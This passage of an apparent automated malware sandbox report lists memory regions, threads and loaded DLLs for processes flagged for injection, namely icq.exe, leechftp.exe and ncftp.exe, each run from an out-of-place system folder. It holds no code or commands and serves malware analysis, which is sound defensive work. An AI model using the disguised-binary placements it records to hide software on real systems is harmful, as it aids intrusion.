"private_0x000000007ffe0000" filename = "" Region: id = 2087 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2088 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2089 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2091 start_va = 0x2040000 end_va = 0x216efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Thread: id = 106 os_tid = 0xf48 Thread: id = 107 os_tid = 0x424 Process: id = "20" image_name = "icq.exe" filename = "c:\\program files\\windows defender\\icq.exe" page_root = "0x384a7000" os_pid = "0x9cc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files\\Windows Defender\\icq.exe\" " cur_dir = "C:\\Program Files\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2093 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2094 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2095 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2096 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2097 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2098 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2099 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2100 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2101 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2102 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2103 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2104 start_va = 0x1f0000 end_va = 0x1f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2105 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2106 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2107 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2108 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 2109 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 2110 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 2111 start_va = 0xa80000 end_va = 0xb3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 2112 start_va = 0xba0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2113 start_va = 0x1200000 end_va = 0x1216fff monitored = 0 entry_point = 0x12014a1 region_type = mapped_file name = "icq.exe" filename = "\\Program Files\\Windows Defender\\icq.exe" (normalized: "c:\\program files\\windows defender\\icq.exe") Region: id = 2114 start_va = 0x1220000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 2115 start_va = 0x2620000 end_va = 0x2fe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 2116 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2117 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2118 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2119 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2120 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2121 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2122 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2123 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2124 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2125 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2126 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2127 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2128 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2129 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2130 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2131 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2132 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2133 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2134 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2135 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2136 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2137 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2138 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2139 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2140 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2141 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2143 start_va = 0xbb0000 end_va = 0xcfcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Thread: id = 108 os_tid = 0xf64 Thread: id = 109 os_tid = 0x30c Process: id = "21" image_name = "leechftp.exe" filename = "c:\\program files (x86)\\msbuild\\leechftp.exe" page_root = "0x4fc1000" os_pid = "0xed0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\MSBuild\\leechftp.exe\" " cur_dir = "C:\\Program Files (x86)\\MSBuild\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2144 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2145 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2146 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2147 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2148 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2149 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2150 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2151 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2152 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2153 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2154 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2155 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2156 start_va = 0x480000 end_va = 0x48ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2157 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2158 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2159 start_va = 0x630000 end_va = 0x6edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2160 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2161 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 2162 start_va = 0xb20000 end_va = 0xb36fff monitored = 0 entry_point = 0xb214a1 region_type = mapped_file name = "leechftp.exe" filename = "\\Program Files (x86)\\MSBuild\\leechftp.exe" (normalized: "c:\\program files (x86)\\msbuild\\leechftp.exe") Region: id = 2163 start_va = 0xb40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 2164 start_va = 0x1f40000 end_va = 0x1ffbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 2165 start_va = 0x20b0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 2166 start_va = 0x20c0000 end_va = 0x2a83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020c0000" filename = "" Region: id = 2167 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2168 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2169 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2170 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2171 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2172 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2173 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2174 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2175 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2176 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2177 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2178 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2179 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2180 start_va = 0x75a70000 end_va = 0x75b8efff monitored = 0 entry_point = 0x75ab5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2181 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2182 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2183 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2184 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2185 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2186 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2187 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2188 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2189 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2190 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2191 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2192 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 2194 start_va = 0x2a90000 end_va = 0x2be5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a90000" filename = "" Thread: id = 110 os_tid = 0x9c0 Thread: id = 111 os_tid = 0xec Process: id = "22" image_name = "ncftp.exe" filename = "c:\\program files (x86)\\microsoft.net\\ncftp.exe" page_root = "0x392cb000" os_pid = "0xa10" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x78c" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\ncftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2195 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2196 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2197 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2198 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2199 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2200 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2201 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2202 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2203 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2204 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2205 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2206 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2207 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2208 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2209 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2210 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2211 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 2212 start_va = 0x950000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 2213 start_va = 0xae0000 end_va = 0xb9bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 2214 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 2215 start_va = 0xda0000 end_va = 0xdb6fff monitored = 0 entry_point = 0xda14a1 region_type = mapped_file name = "ncftp.exe" filename = "\\Program Files (x86)\\Microsoft.NET\\ncftp.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\ncftp.exe") Region: id = 2216 start_va = 0xdc0000 end_va = 0x21bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 2217 start_va = 0x21c0000 end_va = 0x2b83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021c0000" filename = "" Region: id = 2218 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2219 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2220 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2221 start_va = 0x6fef0000 end_va = 0x6ff0cfff monitored = 0 entry_point = 0x6fef3b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2222 start_va = 0x70610000 end_va = 0x70684fff monitored = 0 entry_point = 0x70649a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2223 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2224 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2225 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: 